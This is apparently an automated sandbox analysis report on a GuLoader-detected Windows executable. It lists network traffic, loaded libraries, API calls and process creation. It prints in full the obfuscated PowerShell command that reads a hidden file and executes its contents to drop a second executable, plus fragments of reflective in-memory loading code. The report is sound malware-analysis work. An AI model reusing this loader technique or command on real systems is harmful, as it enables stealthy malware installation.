      Source: Kvababbelser58.exe, 00000007.00000003.2468899939.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2226806895.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2457346634.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2166743209.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2400959952.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2630051151.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2562021024.00000000054F4000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2306619853.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2177991415.00000000054B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
      Source: Kvababbelser58.exe, 00000007.00000003.2630051151.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2562021024.00000000054F4000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2306619853.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2177991415.00000000054B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
      Source: Kvababbelser58.exe, 00000007.00000003.2306619853.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2177991415.00000000054B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
      Source: Kvababbelser58.exe, 00000007.00000003.2378177514.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2365635239.00000000054B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.comG
      Source: Kvababbelser58.exe, 00000007.00000003.2630051151.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2562021024.00000000054F4000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2306619853.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2177991415.00000000054B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
      Source: Kvababbelser58.exe, 00000007.00000003.2630051151.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2562021024.00000000054F4000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2306619853.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2177991415.00000000054B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
      Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
      Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
      Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
      Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
      Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
      Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
      Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
      Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
      Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
      Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
      Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
      Source: unknownNetwork traffic detected: HTTP traffic on port 49969 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
      Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
      Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49993 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
      Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:49969 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.7:49970 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:49977 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:49979 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:49981 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:49987 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:49991 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:49993 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:49995 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:49997 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:49999 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:50003 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:50005 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:50009 version: TLS 1.2
      Source: C:\Users\user\Desktop\Cpfkf79Rzk.exeCode function: 0_2_0040542B GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040542B

      System Summary

      barindex
      Powershell drops PE file
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exeJump to dropped file
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess Stats: CPU usage > 49%
      Source: C:\Users\user\Desktop\Cpfkf79Rzk.exeCode function: 0_2_00403359 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403359
      Source: C:\Users\user\Desktop\Cpfkf79Rzk.exeCode function: 0_2_00404C680_2_00404C68
      Source: C:\Users\user\Desktop\Cpfkf79Rzk.exeCode function: 0_2_0040698E0_2_0040698E
      Source: Cpfkf79Rzk.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: classification engineClassification label: mal100.troj.evad.winEXE@6/13@2/2
      Source: C:\Users\user\Desktop\Cpfkf79Rzk.exeCode function: 0_2_00403359 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403359
      Source: C:\Users\user\Desktop\Cpfkf79Rzk.exeCode function: 0_2_004046EC GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004046EC
      Source: C:\Users\user\Desktop\Cpfkf79Rzk.exeCode function: 0_2_00402104 CoCreateInstance,0_2_00402104
      Source: C:\Users\user\Desktop\Cpfkf79Rzk.exeFile created: C:\Users\user\AppData\Roaming\luminancesJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:432:120:WilError_03
      Source: C:\Users\user\Desktop\Cpfkf79Rzk.exeFile created: C:\Users\user~1\AppData\Local\Temp\nsf64CD.tmpJump to behavior
      Source: Cpfkf79Rzk.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
      Source: C:\Users\user\Desktop\Cpfkf79Rzk.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\Cpfkf79Rzk.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: Cpfkf79Rzk.exeReversingLabs: Detection: 55%
      Source: Cpfkf79Rzk.exeVirustotal: Detection: 70%
      Source: C:\Users\user\Desktop\Cpfkf79Rzk.exeFile read: C:\Users\user\Desktop\Cpfkf79Rzk.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\Cpfkf79Rzk.exe "C:\Users\user\Desktop\Cpfkf79Rzk.exe"
      Source: C:\Users\user\Desktop\Cpfkf79Rzk.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Quadruplicates=Get-Content -Raw 'C:\Users\user~1\AppData\Local\Temp\depersonaliseredes\Opjustering\ubekrftede.Amo';$syndactylus=$Quadruplicates.SubString(8202,3);.$syndactylus($Quadruplicates)"
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe "C:\Users\user~1\AppData\Local\Temp\Kvababbelser58.exe"
      Source: C:\Users\user\Desktop\Cpfkf79Rzk.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Quadruplicates=Get-Content -Raw 'C:\Users\user~1\AppData\Local\Temp\depersonaliseredes\Opjustering\ubekrftede.Amo';$syndactylus=$Quadruplicates.SubString(8202,3);.$syndactylus($Quadruplicates)" Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe "C:\Users\user~1\AppData\Local\Temp\Kvababbelser58.exe"Jump to behavior
      Source: C:\Users\user\Desktop\Cpfkf79Rzk.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\Cpfkf79Rzk.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\Cpfkf79Rzk.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\Cpfkf79Rzk.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\Cpfkf79Rzk.exeSection loaded: dwmapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Cpfkf79Rzk.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\Cpfkf79Rzk.exeSection loaded: oleacc.dllJump to behavior
      Source: C:\Users\user\Desktop\Cpfkf79Rzk.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\Cpfkf79Rzk.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\Cpfkf79Rzk.exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\Desktop\Cpfkf79Rzk.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\Cpfkf79Rzk.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\Cpfkf79Rzk.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\Cpfkf79Rzk.exeSection loaded: riched20.dllJump to behavior
      Source: C:\Users\user\Desktop\Cpfkf79Rzk.exeSection loaded: usp10.dllJump to behavior
      Source: C:\Users\user\Desktop\Cpfkf79Rzk.exeSection loaded: msls31.dllJump to behavior
      Source: C:\Users\user\Desktop\Cpfkf79Rzk.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Users\user\Desktop\Cpfkf79Rzk.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Users\user\Desktop\Cpfkf79Rzk.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\Cpfkf79Rzk.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\Cpfkf79Rzk.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\Cpfkf79Rzk.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\Cpfkf79Rzk.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\Desktop\Cpfkf79Rzk.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
      Source: Cpfkf79Rzk.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: on.pdb source: powershell.exe, 00000002.00000002.2059540466.0000000002D6C000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: stem.Core.pdb source: powershell.exe, 00000002.00000002.2064199965.0000000007121000.00000004.00000020.00020000.00000000.sdmp

      Data Obfuscation

      barindex
      Yara detected GuLoader
      Source: Yara matchFile source: 00000007.00000002.2638156664.00000000016FA000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.2070497812.0000000008D1A000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Found suspicious powershell code related to unpacking or dynamic code loading
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Unattainable $Opgaveteksterallotationernes $Sunrises), (Udlbernes @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Tongues = [AppDomain]::CurrentDomain.GetA
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Trimpregneringer)), $Catalytic56).DefineDynamicModule($Skrivelrernes, $false).DefineType($Stafylokokkers, $Triploidy, [System.Multicas
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_02C8A5CF push eax; iretd 2_2_02C8A659
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_02C8E9F9 push eax; mov dword ptr [esp], edx2_2_02C8EA0C
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_071A0FC4 push es; iretd 2_2_071A0FC7
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08C86CF4 push es; iretd 2_2_08C86CF5
